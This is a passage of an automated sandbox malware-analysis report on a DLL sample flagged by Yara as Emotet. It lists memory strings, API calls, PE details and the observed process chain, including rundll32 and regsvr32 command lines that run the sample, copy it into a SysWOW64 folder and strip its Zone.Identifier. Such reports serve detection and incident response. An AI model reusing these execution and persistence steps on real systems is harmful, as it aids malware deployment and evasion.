tityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z\|\|.\|\|58dfb4d5-be7e-424e-8739-cac99224843f\|\|1152921505695035586\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: regsvr32.exe, 00000005.00000003.359199752.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root
Source: svchost.exe, 00000013.00000002.676785569.000002799FC89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.419911241.0000023CC030D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.409528821.0000023CC030C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.775589438.000001BF01500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000013.00000002.676785569.000002799FC89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.419799470.0000023CBFAE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000005.00000003.358463256.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?146a99b97d002
Source: svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000013.00000002.676470792.000002799A4B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.675741527.000002799A4AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumera
Source: svchost.exe, 00000013.00000002.676470792.000002799A4B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.675741527.000002799A4AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 0000000E.00000002.318685600.000002516B413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000B.00000002.774092172.00000175ABA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000B.00000002.774092172.00000175ABA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000B.00000002.774092172.00000175ABA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000B.00000002.773932282.00000175ABA29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000002.773932282.00000175ABA29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000E.00000002.318818550.000002516B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318337851.000002516B449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000E.00000002.318795830.000002516B442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318477372.000002516B441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000E.00000002.318795830.000002516B442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318477372.000002516B441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000016.00000003.389730375.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389593585.0000023CC03AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389883804.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389629399.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389660788.0000023CC03B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389642184.0000023CC039A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389783418.0000023CC0802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389683950.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.318685600.000002516B413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000003.318472678.000002516B456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000003.296644835.000002516B432000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.318720352.000002516B43B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000E.00000002.318818550.000002516B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318337851.000002516B449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000016.00000003.389730375.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389593585.0000023CC03AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389883804.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389629399.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389660788.0000023CC03B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389642184.0000023CC039A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389783418.0000023CC0802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389683950.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000016.00000003.389730375.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389593585.0000023CC03AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389883804.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389629399.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389660788.0000023CC03B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389642184.0000023CC039A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389783418.0000023CC0802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389683950.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000016.00000003.398796153.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.398927241.0000023CC0818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	2_2_10032A2D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1003437E GetKeyState,GetKeyState,GetKeyState,	2_2_1003437E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,	2_2_1002FE1B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	3_2_10032A2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1003437E GetKeyState,GetKeyState,GetKeyState,	3_2_1003437E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,	3_2_1002FE1B

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 4.2.rundll32.exe.4ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.43a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3390000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.46c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.774599292.00000000046C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.261732368.0000000004760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.258847425.0000000003390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.259038196.0000000004CE1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.774512688.0000000004690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.261764431.0000000004791000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.258613972.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.258886140.00000000043A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: CUfsVUDkr6.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

File deleted: C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Ofpagmb\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001409B	2_2_1001409B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10023973	2_2_10023973
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10010A0C	2_2_10010A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000DB7F	2_2_1000DB7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001409B	3_2_1001409B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10023973	3_2_10023973
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000DB7F	3_2_1000DB7F

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10011BF0 appears 111 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10012514 appears 40 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10011BF0 appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10012514 appears 39 times

Source: CUfsVUDkr6.dll	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CUfsVUDkr6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CUfsVUDkr6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CUfsVUDkr6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll	Jump to behavior

Source: CUfsVUDkr6.dll

Virustotal: Detection: 66%

Source: CUfsVUDkr6.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\CUfsVUDkr6.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllUnregisterServerr
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\CUfsVUDkr6.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllUnregisterServerr	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@28/8@0/38

Source: C:\Windows\SysWOW64\regsvr32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:5648:120:WilError_01

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10006120 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,

2_2_10006120

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: CUfsVUDkr6.dll	Static PE information: section name: RT_CURSOR
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_BITMAP
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_ICON
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_MENU
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_DIALOG
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_STRING
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_ACCELERATOR
Source: CUfsVUDkr6.dll	Static PE information: section name: RT_GROUP_ICON

Source: CUfsVUDkr6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CUfsVUDkr6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CUfsVUDkr6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CUfsVUDkr6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CUfsVUDkr6.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10010B20 push eax; ret	2_2_10010B34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10010B20 push eax; ret	2_2_10010B5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10011BF0 push eax; ret	2_2_10011C0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001254F push ecx; ret	2_2_1001255F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10010B20 push eax; ret	3_2_10010B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10010B20 push eax; ret	3_2_10010B5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10011BF0 push eax; ret	3_2_10011C0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001254F push ecx; ret	3_2_1001255F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,

2_2_10025CEC

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\CUfsVUDkr6.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

PE file moved: C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam

Jump to behavior

